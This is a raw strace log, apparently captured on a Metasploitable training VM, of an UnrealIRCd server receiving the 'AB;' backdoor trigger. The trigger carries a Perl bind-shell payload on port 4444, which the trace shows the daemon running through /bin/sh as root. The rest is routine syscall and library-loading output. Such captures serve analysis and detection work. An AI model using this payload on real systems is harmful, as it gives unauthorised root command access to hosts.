4519  07:33:42.313593 select(1024, [2 3 4 7 9], [], NULL, {0, 480000}) = 1 (in [2], left {0, 300000})

4519  07:33:42.492611 clock_gettime(CLOCK_MONOTONIC, {2432, 309632383}) = 0

4519  07:33:42.492633 time(NULL)        = 1495625622

4519  07:33:42.492645 time(NULL)        = 1495625622

4519  07:33:42.492661 gettimeofday({1495625622, 492665}, NULL) = 0

4519  07:33:42.492674 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:33:42.492713 clock_gettime(CLOCK_MONOTONIC, {2432, 309726565}) = 0

4519  07:33:42.492724 gettimeofday({1495625622, 492727}, NULL) = 0

4519  07:33:42.492735 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:33:42.492784 clock_gettime(CLOCK_MONOTONIC, {2432, 309797840}) = 0

4519  07:33:42.492825 accept(2, 0, NULL) = 5

4519  07:33:42.492848 getpeername(5, {sa_family=AF_INET, sin_port=htons(34933), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:33:42.492913 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:33:42.492925 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:33:42.492938 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:33:42.492950 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:33:42.492961 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:33:42.492972 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:33:42.493036 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:33:42.493054 clock_gettime(CLOCK_MONOTONIC, {2432, 310067938}) = 0

4519  07:33:42.493066 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:33:42.493078 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:33:42.493088 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:33:42.493097 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:33:42.493107 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:33:42.493123 send(6, "\222\37\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:33:42.493185 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:33:42.493241 gettimeofday({1495625622, 493245}, NULL) = 0

4519  07:33:42.493253 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:33:42.498241 clock_gettime(CLOCK_MONOTONIC, {2432, 315258840}) = 0

4519  07:33:42.498258 recvfrom(6, "\222\37\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\370\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:33:42.498299 close(6)          = 0

4519  07:33:42.498314 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:33:42.498328 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:33:42.498384 time(NULL)        = 1495625622

4519  07:33:42.498397 time(NULL)        = 1495625622

4519  07:33:42.498408 gettimeofday({1495625622, 498412}, NULL) = 0

4519  07:33:42.498420 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:33:42.498486 clock_gettime(CLOCK_MONOTONIC, {2432, 315499364}) = 0

4519  07:33:42.498497 gettimeofday({1495625622, 498501}, NULL) = 0

4519  07:33:42.498508 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [7], left {0, 130000})

4519  07:33:43.367521 clock_gettime(CLOCK_MONOTONIC, {2433, 184542659}) = 0

4519  07:33:43.367544 recv(7, "PRIVMSG  #testit2 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55

4519  07:33:43.367569 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367590 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367605 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367619 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367633 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367656 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367670 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367683 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367697 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367711 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367724 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367738 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367751 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367765 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367778 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367792 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367805 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367819 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367833 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367847 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367860 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367874 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:43.367890 gettimeofday({1495625623, 367894}, NULL) = 0

4519  07:33:43.367903 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:33:43.367954 clock_gettime(CLOCK_MONOTONIC, {2433, 184968299}) = 0

4519  07:33:43.367968 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:33:43.367996 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:33:43.368016 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:33:43.368028 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:33:43.368043 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10585

10585 07:33:43.368135 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10585 07:33:43.368150 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10585 07:33:43.368161 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10585 07:33:43.368174 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10585 07:33:43.368281 brk(0)            = 0x80f9000

10585 07:33:43.368304 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10585 07:33:43.368321 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd0000

10585 07:33:43.368337 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10585 07:33:43.368354 open("/etc/ld.so.cache", O_RDONLY) = 1

10585 07:33:43.368367 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10585 07:33:43.368386 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fc8000

10585 07:33:43.368396 close(1)          = 0

10585 07:33:43.368407 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10585 07:33:43.368422 open("/lib/libncurses.so.5", O_RDONLY) = 1

10585 07:33:43.368436 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10585 07:33:43.368583 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10585 07:33:43.368601 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f98000

10585 07:33:43.368613 mmap2(0xb7fc5000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7fc5000

10585 07:33:43.368631 close(1)          = 0

10585 07:33:43.368643 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10585 07:33:43.368657 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10585 07:33:43.368671 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10585 07:33:43.368762 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10585 07:33:43.368779 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f94000

10585 07:33:43.368790 mmap2(0xb7f96000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f96000

10585 07:33:43.368806 close(1)          = 0

10585 07:33:43.368817 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10585 07:33:43.368831 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10585 07:33:43.368845 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10585 07:33:43.368936 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10585 07:33:43.368962 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f93000

10585 07:33:43.368976 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e44000

10585 07:33:43.368987 mmap2(0xb7f8d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f8d000

10585 07:33:43.369001 mmap2(0xb7f90000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f90000

10585 07:33:43.369015 close(1)          = 0

10585 07:33:43.369037 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e43000

10585 07:33:43.369049 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e436b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10585 07:33:43.369105 mprotect(0xb7f8d000, 4096, PROT_READ) = 0

10585 07:33:43.369142 munmap(0xb7fc8000, 29913) = 0

10585 07:33:43.369168 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10585 07:33:43.369182 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10585 07:33:43.369201 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfcd6e90) = -1 ENOTTY (Inappropriate ioctl for device)

10585 07:33:43.369232 brk(0)            = 0x80f9000

10585 07:33:43.369241 brk(0x80fa000)    = 0x80fa000

10585 07:33:43.369253 brk(0x80fb000)    = 0x80fb000

10585 07:33:43.369269 getuid32()        = 0

10585 07:33:43.369279 getgid32()        = 0

10585 07:33:43.369288 geteuid32()       = 0

10585 07:33:43.369297 getegid32()       = 0

10585 07:33:43.369311 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10585 07:33:43.369324 time(NULL)        = 1495625623

10585 07:33:43.369337 brk(0x80fc000)    = 0x80fc000

10585 07:33:43.369351 brk(0x80fd000)    = 0x80fd000

10585 07:33:43.369371 open("/proc/meminfo", O_RDONLY) = 1

10585 07:33:43.369393 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10585 07:33:43.369410 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fcf000

10585 07:33:43.369422 read(1, "MemTotal:      1035240 kB\nMemFree:        408184 kB\nBuffers:         78240 kB\nCached:         389184 kB\nSwapCached:          0 kB\nActive:         256516 kB\nInactive:       339836 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        407944 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4420 kB\nWriteback:           0 kB\nAnonPages:      128980 kB\nMapped:          52004 kB\nSlab:            19352 kB\nSReclaimable:    10752 kB\nSUnreclaim:       8600 kB\nPageTables:       1956 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10585 07:33:43.369515 close(1)          = 0

10585 07:33:43.369527 munmap(0xb7fcf000, 4096) = 0

10585 07:33:43.369539 brk(0x80fe000)    = 0x80fe000

10585 07:33:43.369566 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10585 07:33:43.369579 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10585 07:33:43.369592 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10585 07:33:43.369603 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10585 07:33:43.369615 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10585 07:33:43.369627 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10585 07:33:43.369641 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10585 07:33:43.369653 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10585 07:33:43.369670 uname({sys="Linux", node="metasploitable", ...}) = 0

10585 07:33:43.369718 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10585 07:33:43.369737 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10585 07:33:43.369756 brk(0x8100000)    = 0x8100000

10585 07:33:43.369768 getcwd("/etc/unreal", 4096) = 12

10585 07:33:43.369782 getpid()          = 10585

10585 07:33:43.369798 getppid()         = 4519

10585 07:33:43.369814 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10585 07:33:43.369834 stat64("/sbin/sh", 0xbfcd6e68) = -1 ENOENT (No such file or directory)

10585 07:33:43.369847 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10585 07:33:43.369864 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10585 07:33:43.369888 socket(PF_FILE, SOCK_STREAM, 0) = 1

10585 07:33:43.369901 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10585 07:33:43.369913 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10585 07:33:43.369949 close(1)          = 0

10585 07:33:43.369962 socket(PF_FILE, SOCK_STREAM, 0) = 1

10585 07:33:43.369973 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10585 07:33:43.369983 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10585 07:33:43.370001 close(1)          = 0

10585 07:33:43.370015 open("/etc/nsswitch.conf", O_RDONLY) = 1

10585 07:33:43.370029 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10585 07:33:43.370046 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fcf000

10585 07:33:43.370057 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10585 07:33:43.370107 read(1, "", 4096) = 0

10585 07:33:43.370117 close(1)          = 0

10585 07:33:43.370126 munmap(0xb7fcf000, 4096) = 0

10585 07:33:43.370143 open("/etc/ld.so.cache", O_RDONLY) = 1

10585 07:33:43.370155 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10585 07:33:43.370171 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fc8000

10585 07:33:43.370181 close(1)          = 0

10585 07:33:43.370192 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10585 07:33:43.370207 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10585 07:33:43.370221 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10585 07:33:43.370310 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10585 07:33:43.370328 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e3a000

10585 07:33:43.370339 mmap2(0xb7e41000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e41000

10585 07:33:43.370360 close(1)          = 0

10585 07:33:43.370371 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10585 07:33:43.370385 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10585 07:33:43.370398 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10585 07:33:43.370430 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

